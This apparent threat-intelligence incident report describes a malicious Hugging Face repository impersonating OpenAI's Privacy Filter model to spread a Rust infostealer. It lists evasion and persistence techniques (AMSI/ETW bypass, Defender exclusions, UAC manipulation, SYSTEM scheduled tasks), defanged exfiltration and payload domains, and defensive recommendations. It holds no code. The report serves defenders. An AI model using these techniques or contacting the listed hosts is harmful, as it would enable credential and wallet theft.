Full Report
A malicious Hugging Face repository managed to take a spot in the platform's trending list by impersonating OpenAI's Privacy Filter open-weight model to deliver a Rust-based information stealer to Windows users. The project, named Open-OSS/privacy-filter, masqueraded as its legitimate counterpart released by OpenAI late last month (openai/privacy-filter), including copying the entire description
Analysis Summary
# Incident Report: Malicious Impersonation of OpenAI Privacy Filter on Hugging Face
## Executive Summary
A malicious actor uploaded a typosquatted repository to Hugging Face impersonating OpenAI's "Privacy Filter" model to distribute a Rust-based information stealer. The repository used artificially inflated engagement metrics to reach the #1 trending spot, resulting in over 244,000 downloads before being disabled. The attack primarily targeted Windows users, harvesting sensitive data including cryptocurrency wallets, browser credentials, and Discord tokens.
## Incident Details
- **Discovery Date:** May 2026 (Reported by HiddenLayer)
- **Incident Date:** Late April to May 2026
- **Affected Organization:** Users of Hugging Face; impersonated OpenAI
- **Sector:** AI/Technology, Supply Chain
- **Geography:** Global
## Timeline of Events
### Initial Access
- **Date/Time:** May 2026
- **Vector:** Phishing/Supply Chain (Typosquatting)
- **Details:** Attackers created a repository `Open-OSS/privacy-filter` mimicking the legitimate `openai/privacy-filter`. They copied documentation verbatim and used botting to inflate likes (667) and downloads (244,000) to gain "Trending" status.
### Lateral Movement
- **Details:** Not applicable in the traditional network sense; the malware focused on local environment escalation and data harvesting once executed on a victim's machine.
### Data Exfiltration/Impact
- **Details:** The Rust-based payload harvested Discord tokens, cryptocurrency wallet seed phrases/extensions, FileZilla configurations, system metadata, and browser data (Chromium/Gecko). Screenshots were also captured.
### Detection & Response
- **How it was discovered:** Research by the HiddenLayer Research Team.
- **Response actions taken:** Hugging Face disabled access to the malicious repository and several other identified secondary repositories.
## Attack Methodology
- **Initial Access:** Typosquatting and Social Engineering (masquerading as a trusted OpenAI model).
- **Persistence:** High-privilege Scheduled Task (though temporary, designed to run in SYSTEM context).
- **Privilege Escalation:** UAC prompt manipulation via a malicious batch script.
- **Defense Evasion:** Disabling SSL verification; AMSI and ETW bypass; Microsoft Defender exclusions; Sandbox/VM/Debugger detection; Dead drop resolver (JSON Keeper).
- **Credential Access:** Harvesting browser-stored passwords, Discord tokens, and wallet seed phrases.
- **Discovery:** System metadata collection and environment checks for virtualizations.
- **Lateral Movement:** N/A.
- **Collection:** Automated gathering of files (FileZilla, wallets) and screenshotting.
- **Exfiltration:** Data sent in JSON format to `recargapopular[.]com`.
- **Impact:** Significant data theft and compromise of sensitive financial/personal accounts.
## Impact Assessment
- **Financial:** High potential loss due to the theft of cryptocurrency wallet seed phrases.
- **Data Breach:** Extensive; includes PII, login credentials, and session tokens from 244k potential downloads.
- **Operational:** System compromise via a one-shot SYSTEM-context execution.
- **Reputational:** High impact on the perceived safety of Hugging Face's "Trending" list and supply chain trust.
## Indicators of Compromise
- **Network Indicators:**
- `api.eth-fastscan[.]org` (Payload hosting)
- `recargapopular[.]com` (Exfiltration)
- `welovechinatown[.]info` (C2/Secondary payload)
- `jsonkeeper[.]com` (Dead drop resolver)
- **File Indicators:**
- `loader.py`
- `start.bat`
- `o0q2l47f.exe` (Associated binary)
- **Behavioral Indicators:**
- Unusual PowerShell execution with SSL verification disabled.
- Automated creation and immediate deletion of SYSTEM-level scheduled tasks.
- Unexpected UAC prompts from AI model setup scripts.
## Response Actions
- **Containment:** Hugging Face took down the primary `Open-OSS/privacy-filter` repository.
- **Eradication:** Six additional repositories under the `anthfu/` namespace were identified and removed.
- **Recovery:** Public reporting by HiddenLayer to alert the community and provide IOCs for remediation.
## Lessons Learned
- **Key Takeaways:** Popularity metrics (likes/downloads) on platform marketplaces are easily manipulated and should not be the sole basis for trust.
- **Gaps:** AI model repositories often require executing scripts (like `loader.py`) to function, providing a seamless vector for traditional malware.
## Recommendations
- **Verify Sources:** Always double-check the organization namespace on Hugging Face (e.g., `openai/` vs `Open-OSS/`).
- **Sandbox Execution:** Run experimental or new AI models in isolated, non-persistent virtual environments.
- **Code Review:** Inspect `loader.py` or `setup` scripts in public repositories for Base64 encoded URLs or suspicious PowerShell calls before execution.
- **Monitor Platforms:** Platform providers should implement stricter verification for "Trending" algorithms to prevent bot-driven manipulation.